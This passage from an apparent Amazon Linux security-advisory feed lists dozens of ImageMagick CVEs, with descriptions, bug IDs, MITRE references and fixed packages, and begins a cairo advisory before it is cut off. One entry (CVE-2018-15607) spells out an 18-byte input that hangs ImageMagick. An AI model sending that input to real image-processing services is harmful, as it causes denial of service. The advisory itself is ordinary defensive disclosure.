ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
1801674: CVE-2019-16712 ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps3.c
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
1801673: CVE-2019-16711 ImageMagick: memory leak in Huffman2DEncodeImage in coders/ps2.c
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
1801667: CVE-2019-16710 ImageMagick: memory leak in coders/dot.c
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
1801661: CVE-2019-16709 ImageMagick: memory leak in coders/dps.c
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
1801665: CVE-2019-16708 ImageMagick: memory leak in magick/xwindow.c
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
1767802: CVE-2019-15141 ImageMagick: heap-based buffer overflow in WriteTIFFImage in coders/tiff.c
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
1767828: CVE-2019-15140 ImageMagick: Use after free in ReadMATImage in coders/mat.c
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
1767812: CVE-2019-15139 ImageMagick: out-of-bounds read in ReadXWDImage in coders/xwd.c
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
1757911: CVE-2019-14981 ImageMagick: division by zero in MeanShiftImage in MagickCore/feature.c
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
1757779: CVE-2019-14980 ImageMagick: use-after-free in magick/blob.c resulting in a denial of service
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
1728474: CVE-2019-13454 ImageMagick: division by zero in RemoveDuplicateLayers in MagickCore/layer.c
CVE-2019-13311:
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of a wand/mogrify.c error.
1730329: CVE-2019-13311 ImageMagick: memory leaks at AcquireMagickMemory because of a wand/mogrify.c error
CVE-2019-13310:
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of an error in MagickWand/mogrify.c.
1730333: CVE-2019-13310 ImageMagick: memory leaks at AcquireMagickMemory because of an error in MagickWand/mogrify.c
CVE-2019-13309:
ImageMagick 7.0.8-50 Q16 has memory leaks at AcquireMagickMemory because of mishandling the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c.
1730337: CVE-2019-13309 ImageMagick: memory leaks at AcquireMagickMemory due to mishandling the NoSuchImage error in CLIListOperatorImages
CVE-2019-13307:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling rows.
1730351: CVE-2019-13307 ImageMagick: heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling rows
CVE-2019-13306:
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of off-by-one errors.
1730357: CVE-2019-13306 ImageMagick: stack-based buffer overflow at coders/pnm.c in WritePNMImage because of off-by-one errors
CVE-2019-13305:
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced strncpy and an off-by-one error.
1730361: CVE-2019-13305 ImageMagick: stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced strncpy and an off-by-one error
CVE-2019-13304:
ImageMagick 7.0.8-50 Q16 has a stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced assignment.
1730364: CVE-2019-13304 ImageMagick: stack-based buffer overflow at coders/pnm.c in WritePNMImage because of a misplaced assignment
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
1730575: CVE-2019-13301 ImageMagick: memory leaks in AcquireMagickMemory
CVE-2019-13300:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling columns.
1730580: CVE-2019-13300 ImageMagick: heap-based buffer overflow at MagickCore/statistic.c in EvaluateImages because of mishandling columns
CVE-2019-13297:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled.
1730596: CVE-2019-13297 ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled
CVE-2019-13295:
ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled.
1730604: CVE-2019-13295 ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
1726104: CVE-2019-13135 ImageMagick: a "use of uninitialized value" vulnerability in the function ReadCUTImage leading to a crash and DoS
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
1726081: CVE-2019-13134 ImageMagick: a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
1726078: CVE-2019-13133 ImageMagick: a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
1732294: CVE-2019-12979 imagemagick: use of uninitialized value in function SyncImageSettings in MagickCore/image.c
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
1732292: CVE-2019-12978 imagemagick: use of uninitialized value in function ReadPANGOImage in coders/pango.c
CVE-2019-12976:
ImageMagick 7.0.8-34 has a memory leak in the ReadPCLImage function in coders/pcl.c.
1732284: CVE-2019-12976 imagemagick: memory leak vulnerability in function ReadPCLImage in coders/pcl.c
CVE-2019-12975:
ImageMagick 7.0.8-34 has a memory leak vulnerability in the WriteDPXImage function in coders/dpx.c.
1732282: CVE-2019-12975 imagemagick: memory leak vulnerability in function WriteDPXImage in coders/dpx.c
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
1732278: CVE-2019-12974 imagemagick: null-pointer dereference in function ReadPANGOImage in coders/pango.c and ReadVIDImage in coders/vid.c causing denial of service
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
1705414: CVE-2019-11598 ImageMagick: heap-based buffer over-read in the function WritePNMImage of coders/pnm.c leading to DoS or information disclosure
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
1705406: CVE-2019-11597 ImageMagick: heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c leading to DoS or information disclosure
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
1707768: CVE-2019-11472 ImageMagick: denial of service in ReadXWDImage in coders/xwd.c in the XWD image parsing component
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
1707770: CVE-2019-11470 ImageMagick: denial of service in cineon parsing component
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
1700755: CVE-2019-10650 ImageMagick: heap-based buffer over-read in WriteTIFFImage of coders/tiff.c leads to denial of service or information disclosure via crafted image file
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick before version 7.0.7-28 in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
1704762: CVE-2019-10131 ImageMagick: off-by-one read in formatIPTCfromBuffer function in coders/meta.c
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
1563875: CVE-2018-9133 ImageMagick: excessive iteration in the DecodeLabImage and EncodeLabImage functions in coders/tiff.c
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
1559892: CVE-2018-8804 ImageMagick: double free in WriteEPTImage function in coders/ept.c
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
1664845: CVE-2018-20467 ImageMagick: infinite loop in coders/bmp.c
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
1642614: CVE-2018-18544 ImageMagick: memory leak in WriteMSLImage of coders/msl.c
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
1627917: CVE-2018-16750 ImageMagick: Memory leak in the formatIPTCfromBuffer function in coders/meta.c
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
1627916: CVE-2018-16749 ImageMagick: reachable assertion in ReadOneJNGImage in coders/png.c
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
1624955: CVE-2018-16328 ImageMagick: NULL pointer dereference in CheckEventLogging function in MagickCore/log.c
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
1622738: CVE-2018-15607 ImageMagick: CPU Exhaustion via crafted input file
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
1609942: CVE-2018-14437 ImageMagick: memory leak in parse8BIM in coders/meta.c
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
1609939: CVE-2018-14436 ImageMagick: memory leak in ReadMIFFImage in coders/miff.c
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
1609936: CVE-2018-14435 ImageMagick: memory leak in DecodeImage in coders/pcd.c
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
1609933: CVE-2018-14434 ImageMagick: memory leak for a colormap in WriteMPCImage in coders/mpc.c
CVE-2018-13153:
In ImageMagick 7.0.8-4, there is a memory leak in the XMagickCommand function in MagickCore/animate.c.
1598471: CVE-2018-13153 ImageMagick: memory leak in the XMagickCommand function in MagickCore/animate.c
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
1594339: CVE-2018-12600 ImageMagick: out of bounds write ReadDIBImage and WriteDIBImage in coders/dib.c
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
1594338: CVE-2018-12599 ImageMagick: out of bounds write in ReadBMPImage and WriteBMPImage in coders/bmp.c
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
1588170: CVE-2018-11656 ImageMagick: memory leak in ReadDCMImage function in coders/dcm.c
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
1577398: CVE-2018-10805 ImageMagick: Memory leak in ReadYCBCRImage
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
1577399: CVE-2018-10804 ImageMagick: Memory leak in WriteTIFFImage
CVE-2018-10177:
In ImageMagick 7.0.7-28, there is an infinite loop in the ReadOneMNGImage function of the coders/png.c file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted mng file.
1572044: CVE-2018-10177 ImageMagick: Infinite loop in coders/png.c:ReadOneMNGImage() allows attackers to cause a denial of service via crafted MNG file
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
1581489: CVE-2017-18273 ImageMagick: infinite loop ReadTXTImage in function in coders/txt.c
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
1581486: CVE-2017-18271 ImageMagick: infinite loop in ReadMIFFImage function in coders/miff.c
CVE-2017-18254:
An issue was discovered in ImageMagick 7.0.7. A memory leak vulnerability was found in the function WriteGIFImage in coders/gif.c, which allows remote attackers to cause a denial of service via a crafted file.
1561744: CVE-2017-18254 ImageMagick: memory leak in WriteGIFImage function in coders/gif.c
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
1561742: CVE-2017-18252 ImageMagick: assertion failure in MogrifyImageList function in MagickWand/mogrify.c
CVE-2017-18251:
An issue was discovered in ImageMagick 7.0.7. A memory leak vulnerability was found in the function ReadPCDImage in coders/pcd.c, which allows remote attackers to cause a denial of service via a crafted file.
1561741: CVE-2017-18251 ImageMagick: memory leak in ReadPCDImage function in coders/pcd.c
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
1708517: CVE-2017-12806 ImageMagick: memory exhaustion in function format8BIM causing denial of service
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
1708521: CVE-2017-12805 ImageMagick: memory exhaustion in function ReadTIFFImage causing denial of service
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
1772643: CVE-2017-11166 ImageMagick: memory leak vulnerability in ReadXWDImage function in coders/xwd.c
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
1532845: CVE-2017-1000476 ImageMagick: CPU exhaustion vulnerability in function ReadDDSInfo in coders/dds.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" 
title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-pecl-imagick-debuginfo" version="3.4.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-imagick-debuginfo-3.4.4-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pecl-imagick" version="3.4.4" release="1.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pecl-imagick-3.4.4-1.8.amzn1.x86_64.rpm</filename></package><package name="php-pecl-imagick-debuginfo" version="3.4.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-imagick-debuginfo-3.4.4-1.8.amzn1.i686.rpm</filename></package><package name="php-pecl-imagick" version="3.4.4" release="1.8.amzn1" epoch="0" arch="i686"><filename>Packages/php-pecl-imagick-3.4.4-1.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1392</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1392: 
medium priority package update for cairo</title><issued date="2020-07-14 01:48:00" /><updated date="2020-07-15 17:35:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3190:
The fill_xrgb32_lerp_opaque_spans function in cairo-image-compositor.c in cairo before 1.14.2 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a negative span length.
CVE-2016-3190 cairo: out of bounds read in fill_xrgb32_lerp_opaque_span
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3190" title="" id="CVE-2016-3190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cairo-gobject" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-gobject-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-debuginfo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-debuginfo-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-devel" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-devel-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-tools" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-tools-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-gobject-devel" version="1.12.14" release="6.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/cairo-gobject-devel-1.12.14-6.9.amzn1.x86_64.rpm</filename></package><package name="cairo-gobject" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-gobject-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-gobject-devel" version="1.12.14" release="6.9.amzn1" epoch="0" arch="i686"><filename>Packages/cairo-gobject-devel-1.12.14-6.9.amzn1.i686.rpm</filename></package><package name="cairo-tools" version="1.12.14" release="6.9.amzn1" epoch="0" 